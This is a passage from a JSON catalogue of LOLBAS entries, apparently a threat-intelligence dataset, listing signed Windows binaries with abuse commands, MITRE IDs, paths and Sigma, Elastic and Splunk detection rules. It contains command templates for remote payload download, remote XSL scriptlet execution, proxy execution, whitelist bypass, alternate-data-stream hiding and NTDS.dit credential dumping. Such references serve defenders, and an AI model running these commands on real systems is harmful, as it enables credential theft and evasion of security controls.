(x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a MSAccess command line"},{"type":"IOC","value":"MSAccess making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"]},{"id":"lolbas:mscopilot-exe:0","toolId":"lolbas:mscopilot-exe","toolName":"Mscopilot.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"{CMD} && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot.exe` will spawn the provided command. Parent `mscopilot.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"]},{"id":"lolbas:mscopilot-proxy-exe:0","toolId":"lolbas:mscopilot-proxy-exe","toolName":"Mscopilot_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot_proxy.exe` will spawn the provided command. Parent `mscopilot_proxy.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"]},{"id":"lolbas:msdeploy-exe:0","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msdeploy-exe:1","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msdeploy-exe:2","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination.","usecase":"Copy file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msohtmed-exe:0","toolId":"lolbas:msohtmed-exe","toolName":"MsoHtmEd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MsoHtmEd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"]},{"id":"lolbas:mspub-exe:0","toolId":"lolbas:mspub-exe","toolName":"Mspub.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mspub.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"]},{"id":"lolbas:msxsl-exe:0","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:1","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:2","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:3","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:4","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}","description":"Using remote XML and XSL files, save the transformed XML file to disk.","usecase":"Download a file from the internet and save it to disk.","mitre":["T1105"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:msxsl-exe:5","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name","description":"Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).","usecase":"Download a file from the internet and save it to an NTFS Alternate Data Stream.","mitre":["T1564"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"]},{"id":"lolbas:nmcap-exe:0","toolId":"lolbas:nmcap-exe","toolName":"Nmcap.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap}","description":"Start capture on all network adapters and save to specified .cap (circular) file.\nOptionally, one can add:\n- `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative times (e.g. 30 seconds);\n- `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate after a specific date/time;\n- `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed.\n","usecase":"Capture network traffic on windows to collect sensitive data.","mitre":["T1040"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"]},{"id":"lolbas:ntdsutil-exe:0","toolId":"lolbas:ntdsutil-exe","toolName":"ntdsutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full c:\\\" q q","description":"Dump NTDS.dit into folder","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"ntdsutil.exe with command line including \"ifm\""}],"references":["https://adsecurity.org/?p=2398#CreateIFM","https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"]},{"id":"lolbas:ntsd-exe:0","toolId":"lolbas:ntsd-exe","toolName":"Ntsd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ntsd.exe -g {CMD}","description":"Launches command through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"]},{"id":"lolbas:openconsole-exe:0","toolId":"lolbas:openconsole-exe","toolName":"OpenConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OpenConsole.exe {PATH:.exe}","description":"Execute specified process with OpenConsole.exe as parent process","usecase":"Use OpenConsole.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"OpenConsole.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml"}],"references":["https://twitter.com/nas_bench/status/1537563834478645252","https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"]},{"id":"lolbas:outlook-exe:0","toolId":"lolbas:outlook-exe","toolName":"Outlook.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Outlook.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"]},{"id":"lolbas:pixtool-exe:0","toolId":"lolbas:pixtool-exe","toolName":"Pixtool.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pixtool.exe launch {PATH_ABSOLUTE:.exe}","description":"Launches an executable via PIX command-line utility.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"toolType":"OtherMSBinary","references":["https://devblogs.microsoft.com/pix/pixtool/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"]},{"id":"lolbas:powerpnt-exe:0","toolId":"lolbas:powerpnt-exe","toolName":"Powerpnt.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Powerpnt.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"]},{"id":"lolbas:procdump-exe:0","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} explorer.exe","description":"Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process 